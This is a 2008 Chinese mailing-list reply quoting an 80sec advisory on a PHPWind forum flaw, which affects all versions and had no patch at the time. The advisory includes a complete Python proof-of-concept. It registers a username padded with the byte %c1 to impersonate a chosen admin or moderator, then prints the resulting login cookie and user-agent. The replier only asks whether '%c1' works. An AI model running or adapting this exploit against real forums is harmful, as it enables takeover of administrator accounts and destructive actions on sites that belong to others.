%c1 ? 行不行啊?

2008/5/31 est <[EMAIL PROTECTED]>:

> http://www.80sec.com/release/phpwind-exploit.txt
>
> 漏洞发布:http://www.80sec.com/
>
> [EMAIL PROTECTED]
>
> 漏洞厂商:   http://www.phpwind.com/
>                PHPWind 论坛系统 是一套采用 php+mysql 数据库 方式运行并可生成 html
> 页面的全新且完善的强大系统。因具有非凡的访问
> 速度和卓越的负载能力而深受国内外朋友的喜爱。
>                本漏洞影响phpwind所有版本
>
> 漏洞危害:高
>
> 漏洞说明:phpwind是国内使用非常广泛的一款程序,由于在程序设计上存在错误,导致任何人可以取得前台管理员及斑主权限,做删除帖子等任意操作
>
> 利用方式:http://www.80sec.com有提供exploit
>
> 漏洞分析:由于phpwind论坛在设计上对数据库存储机制不了解,导致在程序逻辑上判断有问题,用精心构造的数据注册用户即可获得管理权限
>
> 漏洞修补:建议关闭注册功能等待官方出补丁
>
> 漏洞状态:08.5.25发现此漏洞
>          08.6.1由80sec.com <http://08.6.1%E7%94%B180sec.com>公开此漏洞
>          暂无补丁
>
> 漏洞测试:
>
> [code]
> # -*- coding: gb2312 -*-
> import urllib2,httplib,sys
> httplib.HTTPConnection.debuglevel = 1
> cookies = urllib2.HTTPCookieProcessor()
> opener = urllib2.build_opener(cookies)
>
>
> def banner():
>    print ""
>    print "########################################################"
>    print "Phpwind所有版本管理权限泄露漏洞利用poc"
>    print "Copyright (C) 2006"
>    print "[EMAIL PROTECTED]"
>    print "80sec是一个新的致力于web安全的小团体"
>    print "http://www.80sec.com";
>
> def usage():
>    banner()
>    print "Usage:\n"
>    print "   $ ./phpwind.py pwforumurl usertoattack\n"
>    print "   pwforumurl        目标论坛地址如http://www.80sec.com/";
>    print "   usertoattack      目标拥有权限的斑竹或管理员"
>    print "   攻击结果将会在目标论坛注册一个和目标用户一样的帐户"
>    print "   最新版本可以使用uid登陆"
>    print "   其他版本可以使用cookie+useragent登陆"
>    print "########################################################"
>    print ""
>
>
> argvs=sys.argv
> usage()
>
>
> data = "regname=%s
> %s1&[EMAIL PROTECTED]&[EMAIL PROTECTED]&[EMAIL PROTECTED]
> &regemailtoall=1&step=2"
> % (argvs[2],"%c1")
> pwurl = "%s/register.php" % argvs[1]
>
> request = urllib2.Request(
>        url     = pwurl ,
>        headers = {'Content-Type' : 'application/x-www-form-
> urlencoded','User-Agent': '80sec owned this'},
>        data    = data)
>
> f=opener.open(request)
> headers=f.headers.dict
> cookie=headers["set-cookie"]
> try:
>        if cookie.index('winduser'):
>                print "Exploit Success!"
>                print "Login with uid password @80sec or Cookie:"
>                print cookie
>                print "User-agent: 80sec owned this"
> except:
>        print "Error! http://www.80sec.com";
>        print "Connect root#80sec.com"
> [/code]
>
>
>
> >
>


-- 
BLOG: http://www.blogjava.net/baicker

--~--~---------~--~----~------------~-------~--~----~
 要向邮件组发送邮件,请发到 [email protected]
 要退订此邮件,请发邮件至 [EMAIL PROTECTED]
-~----------~----~----~----~------~----~------~--~---

回复